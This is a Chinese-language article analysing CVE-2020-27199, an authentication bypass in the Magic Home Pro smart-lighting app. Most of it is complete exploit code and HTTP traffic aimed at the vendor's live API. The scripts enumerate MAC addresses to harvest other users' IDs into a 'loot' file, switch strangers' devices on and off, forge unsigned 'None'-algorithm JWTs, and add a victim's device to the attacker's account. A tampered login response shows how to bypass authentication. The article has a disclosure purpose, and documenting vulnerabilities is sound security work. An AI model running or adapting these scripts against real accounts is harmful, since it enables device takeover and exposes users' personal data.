溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
這篇文章主要介紹Magic Home Pro身份認證繞過漏洞CVE-2020-27199的示例分析,文中介紹的非常詳細,具有一定的參考價值,感興趣的小伙伴們一定要看完!
一臺已Root的Android手機;
JAR重新簽名,重新構建APK;
Frida證書綁定繞過;
受影響應用:Magic Home Pro
產品廠商:JadeHomic
WiFi控制器產品廠商:Suzhou SmartChip Semiconductor Co.,Ltd
廠商官網:JadeHomic
受影響產品代碼:Magic Home Pro
該漏洞將允許任何經過身份驗證的用戶使用其當前授權級別,通過調用/app/getBindedUserListByMacAddress/ZG001?macAddress=<mac address> API來查詢與其注冊產品無關的終端節點。這將導致服務器端返回響應信息 并指示目標節點是否存在,然后返回相關節點的用戶名、用戶唯一標識符(userUniID)和綁定唯一ID(bindedUniID)。
通過執行上述查詢請求,攻擊者就可以利用指向/app/sendCommandBatch/ZG001 API的未授權POST請求、新枚舉的Mac地址和兼容的十六進制命令71230fa3(ON)及71240fa4(OFF)來向遠程節點發送命令了。
初始枚舉完成后,攻擊者還可以使用JWT Payload數據中的userID和uniID偽造JWT,本質上來說應該是可以將令牌降級為使用JWT Header字段中的“None”算法(簽名繞過漏洞)。在該漏洞的幫助下,攻擊者將能夠通過向/app/shareDevice/ZG001發起遠程API調用并使用friendUserID這個JSON參數來將目標設備添加至攻擊者的設備列表中,從而實現攻擊,此時攻擊者將能夠完全獲取目標設備的控制權限。
繞過身份驗證
信息披露
未經授權的訪問
橫向權限提升
需要經過身份驗證的用戶
現有終端系統的成功枚舉
隨后將批處理命令發送到遠程節點
設備接管
繞過身份驗證
我們的PoC將返回MAC地址范圍內的最后字節進行枚舉并返回結果,如果你需要的話,你也可以測試“遠程執行”的效果。
import requests
import json
import os
from colorama import init
from colorama import Fore, Back, Style
import re
'''
First Stage Authentication
Second Stage Enumerate
Third Stage Remote Execute
'''
global found_macaddresses
found_macaddresses = []
global outtahere
outtahere = ""
q = "q"
global token
def turnOn(target, token):
urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
array = {
"dataCommandItems":[
{"hexData":"71230fa3","macAddress":target}
]
}
data = json.dumps(array)
headersOn = {
"User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
"Accept-Language": "en-US",
"Accept": "application/json",
"Content-Type": "application/json; charset=utf-8",
"token":token,
"Host": "wifij01us.magichue.net",
"Connection": "close",
"Accept-Encoding": "gzip, deflate"
}
print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOn, data=data, headers=headersOn)
if response.status_code == 200:
if "true" in response.text:
print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On")
else:
print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")
def turnOff(target, token):
urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
array = {
"dataCommandItems":[
{"hexData":"71240fa4","macAddress":target}
]
}
data = json.dumps(array)
headersOff = {
"User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
"Accept-Language": "en-US",
"Accept": "application/json",
"Content-Type": "application/json; charset=utf-8",
"token":token,
"Host": "wifij01us.magichue.net",
"Connection": "close",
"Accept-Encoding": "gzip, deflate"
}
print (Fore.WHITE + "[+] Sending Payload ...")
response = requests.post(urlOff, data=data, headers=headersOff)
if response.status_code == 200:
if "true" in response.text:
print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off")
else:
print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")
def lighItUp(target, token):
outtahere = ""
q = "q"
if len(str(target)) < 12:
print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL)
elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()):
while outtahere.lower() != q.lower():
if outtahere == "0":
turnOn(target, token)
elif outtahere == "1":
turnOff(target, token)
outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)
def Main():
urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"
data = {
"userID":"<Valid Registered Email/Username>",
"password":"<Valid Registered Password>",
"clientID":""
}
headersAuth = {
"User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
"Accept-Language": "en-US",
"Accept": "application/json",
"Content-Type": "application/json; charset=utf-8",
"Host": "wifij01us.magichue.net",
"Connection": "close",
"Accept-Encoding": "gzip, deflate"
}
# First Stage Authenticate
os.system('clear')
print (Fore.WHITE + "[+] Authenticating ...")
response = requests.post(urlAuth, json=data, headers=headersAuth)
resJsonAuth = response.json()
token = (resJsonAuth['token'])
# Second Stage Enumerate
print (Fore.WHITE + "[+] Enumerating ...")
macbase = "C82E475DCE"
macaddress = []
a = ["%02d" % x for x in range(100)]
for num in a:
macaddress.append(macbase+num)
with open('loot.txt', 'w') as f:
for mac in macaddress:
urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001"
params = {
"macAddress":mac
}
headersEnum = {
"User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
"Accept-Language": "en-US",
"Content-Type": "application/json; charset=utf-8",
"Accept": "application/json",
"token": token,
"Host": "wifij01us.magichue.net",
"Connection": "close",
"Accept-Encoding": "gzip, deflate"
}
response = requests.get(urlEnum, params=params, headers=headersEnum)
resJsonEnum = response.json()
data = (resJsonEnum['data'])
if not data:
pass
elif data:
found_macaddresses.append(mac)
print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}")
f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n")
else:
print (Fore.RED + "[-] No results found!")
print(Style.RESET_ALL)
if not found_macaddresses:
print (Fore.RED + "[-] No MAC addresses retrieved")
elif found_macaddresses:
attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)
if (attackboolean.upper() == 'Y'):
target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)
lighItUp(target, token)
elif (attackboolean.upper() == 'N'):
print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL)
else:
print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)
if __name__ == "__main__":
Main()
攻擊者可以使用枚舉成功后返回的userID和uniqID,并利用這個令牌偽造PoC來生成一個新的已簽名令牌并繞過JWT。
#!/usr/local/bin/python3
import url64
import requests
import json
import sys
import os
from colorama import init
from colorama import Fore, Back, Style
import re
import time
from wsgiref.handlers import format_date_time
from datetime import datetime
from time import mktime
now = datetime.now()
stamp = mktime(now.timetuple())
'''
HTTP/1.1 200
Server: nginx/1.10.3
Content-Type: application/json;charset=UTF-8
Connection: close
"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"
'''
def Usage():
print (f"Usage: {sys.argv[0]} <username> <unique id>")
def Main(user, uniqid):
os.system('clear')
print ("[+] Encoding ...")
print ("[+] Bypass header created!")
print ("HTTP/1.1 200")
print ("Server: nginx/1.10.3")
print ("Date: "+str(format_date_time(stamp))+"")
print ("Content-Type: application/json;charset=UTF-8")
print ("Connection: close\r\n\r\n")
jwt_header = '{"typ": "JsonWebToken","alg": "None"}'
jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}'
jwt_headerEncoded = url64.encode(jwt_header.strip())
jwt_dataEncoded = url64.encode(jwt_data.strip())
jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".")
print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}")
if __name__ == "__main__":
if len(sys.argv) < 3:
Usage()
else:
Main(sys.argv[1], sys.argv[2])攻擊者可以利用該漏洞并使用攻擊者的郵件(用于接管目標帳戶的注冊帳戶)、目標用戶郵件(要接管的目標帳戶)、目標設備Mac地址(與目標電子郵件地址關聯)和偽造的令牌來接管目標設備。
#!/usr/local/bin/python3
import url64
import requests
import json
import sys
import os
from colorama import init
from colorama import Fore, Back, Style
import re
def Usage():
print (f"Usage: {sys.argv[0]} <attacker email> <target email> <target mac address> <target forged token>")
def Main():
attacker_email = sys.argv[1]
target_email = sys.argv[2]
target_mac = sys.argv[3]
forged_token = sys.argv[4]
os.system('clear')
print (Fore.WHITE + "[+] Sending Payload ...")
url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"
array = {"friendUserID":attacker_email, "macAddress":target_mac}
data = json.dumps(array)
headers = {
"User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
"Accept-Language": "en-US",
"Accept": "application/json",
"Content-Type": "application/json; charset=utf-8",
"token":forged_token,
"Host": "wifij01us.magichue.net",
"Connection": "close",
"Accept-Encoding": "gzip, deflate"
}
response = requests.post(url, data=data, headers=headers)
if response.status_code == 200:
if "true" in response.text:
print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)
else:
print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)
if __name__ == "__main__":
if len(sys.argv) < 5:
Usage()
else:
Main()POST Request
POST /app/shareDevice/ZG001 HTTP/1.1
User-Agent: Magic Home/1.5.1(ANDROID,9,en-US)
Accept-Language: en-US
Accept: application/json
token: <forged token, representing the target victim>
Content-Type: application/json; charset=utf-8
Content-Length: 72
Host: wifij01us.magichue.net
Connection: close
Accept-Encoding: gzip, deflate
{"friendUserID":"<attackercontrolled email>","macAddress":"<victim mac address>"}
Response
HTTP/1.1 200
Server: nginx/1.10.3
Date: Tue, 07 Jul 2020 05:31:33 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 31
{"code":0,"msg":"","data":true}利用JSON令牌偽造以及基于上述枚舉的收集信息(即目標用戶的電子郵件、ClientID和UniqID),攻擊者可以通過篡改HTTP響應繞過移動應用程序的身份驗證過程,從而獲得應用程序的非授權權限。
攻擊者利用目標用戶的電子郵件地址、任意密碼和客戶端來以目標用戶身份使用Magic Home Pro應用程序。
然后,攻擊者可以使用步驟1中的詳細信息操作HTTP響應,該步驟將允許攻擊者實現身份認證繞過。
Original HTTP Login Request via Magic Home Pro Mobile app
POST /app/login/ZG001 HTTP/1.1
User-Agent: Magic Home/1.5.1(ANDROID,9,en-US)
Accept-Language: en-US
Accept: application/json
token:
Content-Type: application/json; charset=utf-8
Content-Length: 117
Host: wifij01us.magichue.net
Connection: close
Accept-Encoding: gzip, deflate
{"userID":"<victim userID>","password":"<arbitrary password>","clientID":"<arbitrary ClientID>"}
Original HTTP Response
HTTP/1.1 200
Server: nginx/1.10.3
Date: Thu, 08 Oct 2020 00:08:45 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 37
{"code":10033,"msg":"Password error"}
Edited HTTP Response
HTTP/1.1 200
Server: nginx/1.10.3
Date: Mon, 06 Jul 2020 12:32:02 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 907
{"code":0,"msg":"","data":{"webApi":"wifij01us.magichue.net/app","webPathOta":"http://wifij01us.magichue.net/app/ota/download","tcpServerController":"TCP,8816,ra8816us02.magichue.net","tcpServerBulb":"TCP,8815,ra8815us02.magichue.net","tcpServerControllerOld":"TCP,8806,mhc8806us.magichue.net","tcpServerBulbOld":"TCP,8805,mhb8805us.magichue.net","sslMqttServer":"ssl://192.168.0.112:1883","serverName":"Global","serverCode":"US","userName":"<victim userID>","userEmail":"<victim email>","userUniID":"<uniID gleaned from enumeration>"},"token":"<forged JWT based on gleaned data from API call>"}以上是“Magic Home Pro身份認證繞過漏洞CVE-2020-27199的示例分析”這篇文章的所有內容,感謝各位的閱讀!希望分享的內容對大家有幫助,更多相關知識,歡迎關注億速云行業資訊頻道!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
